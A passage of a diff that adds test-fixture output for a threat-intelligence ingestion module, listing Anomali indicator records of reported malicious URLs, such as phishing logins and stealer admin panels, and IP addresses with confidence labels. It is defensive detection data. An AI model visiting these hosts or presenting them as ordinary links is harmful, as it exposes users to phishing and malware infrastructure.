"threatintel.anomali.modified": "2020-01-22T03:03:42.819Z", + "threatintel.anomali.name": "mal_url: http://extraclick.space/login.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://extraclick.space/login.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:03:42.819Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "extraclick.space", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://extraclick.space/login.php", + "threatintel.indicator.url.path": "/login.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 21304, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332326; iType: mal_url; State: active; Org: RUCloud; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-87" + ], + "threatintel.anomali.modified": "2020-01-22T03:03:52.044Z", + "threatintel.anomali.name": "mal_url: http://petrogarmani.pw/login.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://petrogarmani.pw/login.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:03:52.044Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "petrogarmani.pw", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://petrogarmani.pw/login.php", + "threatintel.indicator.url.path": "/login.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 21882, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332311; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-68" + ], + "threatintel.anomali.modified": "2020-01-22T03:04:01.650Z", + "threatintel.anomali.name": "mal_url: http://worldatdoor.in/mighty/32/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://worldatdoor.in/mighty/32/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:04:01.650Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "worldatdoor.in", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://worldatdoor.in/mighty/32/panel/admin.php", + "threatintel.indicator.url.path": "/mighty/32/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 22491, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332341; iType: mal_url; State: active; Org: Institute of Philosophy, Russian Academy of Scienc; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-92" + ], + "threatintel.anomali.modified": "2020-01-22T03:04:32.717Z", + "threatintel.anomali.name": "mal_url: http://zanlma.com/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://zanlma.com/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:04:32.717Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "zanlma.com", + "threatintel.indicator.url.original": "http://zanlma.com/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 23094, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332303; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-84" + ], + "threatintel.anomali.modified": "2020-01-22T03:04:56.858Z", + "threatintel.anomali.name": "mal_url: http://f0369688.xsph.ru/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://f0369688.xsph.ru/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:04:56.858Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "f0369688.xsph.ru", + "threatintel.indicator.url.original": "http://f0369688.xsph.ru/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 23709, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332380; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-76" + ], + "threatintel.anomali.modified": "2020-01-22T03:04:59.245Z", + "threatintel.anomali.name": "mal_url: http://chol.cc/Work2/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://chol.cc/Work2/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:04:59.245Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "chol.cc", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://chol.cc/Work2/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/Work2/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 24318, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55245868747; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-57" + ], + "threatintel.anomali.modified": "2020-01-23T03:00:22.287Z", + "threatintel.anomali.name": "mal_ip: 192.185.214.199", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '192.185.214.199']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-23T03:00:22.287Z", + "threatintel.indicator.ip": "192.185.214.199", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 24871, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55245868770; iType: mal_url; State: active; Org: Mills College; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-24" + ], + "threatintel.anomali.modified": "2020-01-23T03:01:11.329Z", + "threatintel.anomali.name": "mal_url: http://softtouchcollars.com/Loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://softtouchcollars.com/Loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-23T03:01:11.329Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "softtouchcollars.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://softtouchcollars.com/Loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/Loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 25529, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55245868769; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-61" + ], + "threatintel.anomali.modified": "2020-01-23T03:01:36.682Z", + "threatintel.anomali.name": "mal_url: http://imobiliariatirol.com/gh/panelnew/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://imobiliariatirol.com/gh/panelnew/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-23T03:01:36.682Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "imobiliariatirol.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://imobiliariatirol.com/gh/panelnew/admin.php", + "threatintel.indicator.url.path": "/gh/panelnew/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 26146, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55245868772; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-93" + ], + "threatintel.anomali.modified": "2020-01-23T03:02:15.854Z", + "threatintel.anomali.name": "mal_url: http://deliveryexpressworld.xyz/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://deliveryexpressworld.xyz/five/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-23T03:02:15.854Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "deliveryexpressworld.xyz", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://deliveryexpressworld.xyz/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 26788, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55245868766; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-62" + ], + "threatintel.anomali.modified": "2020-01-23T03:02:47.364Z", + "threatintel.anomali.name": "mal_url: http://f0392261.xsph.ru/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://f0392261.xsph.ru/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-23T03:02:47.364Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "f0392261.xsph.ru", + "threatintel.indicator.url.original": "http://f0392261.xsph.ru/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 27403, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55245868749; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-80" + ], + "threatintel.anomali.modified": "2020-01-23T03:03:05.048Z", + "threatintel.anomali.name": "mal_url: http://104.168.99.168/panel/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://104.168.99.168/panel/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-23T03:03:05.048Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "104.168.99.168", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://104.168.99.168/panel/panel/admin.php", + "threatintel.indicator.url.path": "/panel/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 28008, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55245868767; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-69" + ], + "threatintel.anomali.modified": "2020-01-23T03:03:15.734Z", + "threatintel.anomali.name": "mal_url: http://f0387404.xsph.ru/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://f0387404.xsph.ru/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-23T03:03:15.734Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "f0387404.xsph.ru", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://f0387404.xsph.ru/panel/admin.php", + "threatintel.indicator.url.path": "/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 28643, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55245868768; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-72" + ], + "threatintel.anomali.modified": "2020-01-23T03:03:42.599Z", + "threatintel.anomali.name": "mal_url: http://a0386457.xsph.ru/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://a0386457.xsph.ru/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-23T03:03:42.599Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "a0386457.xsph.ru", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://a0386457.xsph.ru/panel/admin.php", + "threatintel.indicator.url.path": "/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 29278, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078037; iType: mal_url; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-74" + ], + "threatintel.anomali.modified": "2020-01-24T02:57:04.821Z", + "threatintel.anomali.name": "mal_url: http://defenseisrael.com/dis/index.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://defenseisrael.com/dis/index.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:57:04.821Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "defenseisrael.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://defenseisrael.com/dis/index.php", + "threatintel.indicator.url.path": "/dis/index.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 29854, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078030; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-83" + ], + "threatintel.anomali.modified": "2020-01-24T02:57:04.857Z", + "threatintel.anomali.name": "mal_ip: 91.215.170.249", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '91.215.170.249']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:57:04.857Z", + "threatintel.indicator.ip": "91.215.170.249", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 30419, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078019; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-79" + ], + "threatintel.anomali.modified": "2020-01-24T02:57:04.883Z", + "threatintel.anomali.name": "mal_url: http://lbfb3f03.justinstalledpanel.com/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://lbfb3f03.justinstalledpanel.com/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:57:04.883Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "lbfb3f03.justinstalledpanel.com", + "threatintel.indicator.url.original": "http://lbfb3f03.justinstalledpanel.com/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 31024, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078035; iType: mal_url; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-93" + ], + "threatintel.anomali.modified": "2020-01-24T02:57:12.997Z", + "threatintel.anomali.name": "mal_url: http://byedtronchgroup.yt/jik/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://byedtronchgroup.yt/jik/Panel/five/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:57:12.997Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "byedtronchgroup.yt", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://byedtronchgroup.yt/jik/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/jik/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 31656, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078008; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-87" + ], + "threatintel.anomali.modified": "2020-01-24T02:57:13.025Z", + "threatintel.anomali.name": "mal_url: http://199.192.28.11/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://199.192.28.11/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:57:13.025Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "199.192.28.11", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://199.192.28.11/panel/admin.php", + "threatintel.indicator.url.path": "/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 32244, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078038; iType: mal_url; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-82" + ], + "threatintel.anomali.modified": "2020-01-24T02:57:32.901Z", + "threatintel.anomali.name": "mal_url: http://217.8.117.51/aW8bVds1/login.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://217.8.117.51/aW8bVds1/login.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:57:32.901Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "217.8.117.51", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://217.8.117.51/aW8bVds1/login.php", + "threatintel.indicator.url.path": "/aW8bVds1/login.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 32820, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078026; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-93" + ], + "threatintel.anomali.modified": "2020-01-24T02:57:32.929Z", + "threatintel.anomali.name": "mal_url: http://lansome.site/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://lansome.site/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:57:32.929Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "lansome.site", + "threatintel.indicator.url.original": "http://lansome.site/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 33391, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078034; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-83" + ], + "threatintel.anomali.modified": "2020-01-24T02:57:49.028Z", + "threatintel.anomali.name": "mal_url: http://iplusvietnam.com.vn/jo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://iplusvietnam.com.vn/jo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:57:49.028Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "iplusvietnam.com.vn", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://iplusvietnam.com.vn/jo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/jo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 34081, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078032; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-94" + ], + "threatintel.anomali.modified": "2020-01-24T02:58:03.345Z", + "threatintel.anomali.name": "mal_url: http://leakaryadeen.com/parl/id345/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://leakaryadeen.com/parl/id345/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:58:03.345Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "leakaryadeen.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://leakaryadeen.com/parl/id345/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/parl/id345/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 34720, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078031; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-81" + ], + "threatintel.anomali.modified": "2020-01-24T02:58:16.318Z", + "threatintel.anomali.name": "mal_url: http://oaa-my.com/clap/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://oaa-my.com/clap/five/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:58:16.318Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "oaa-my.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://oaa-my.com/clap/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/clap/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", 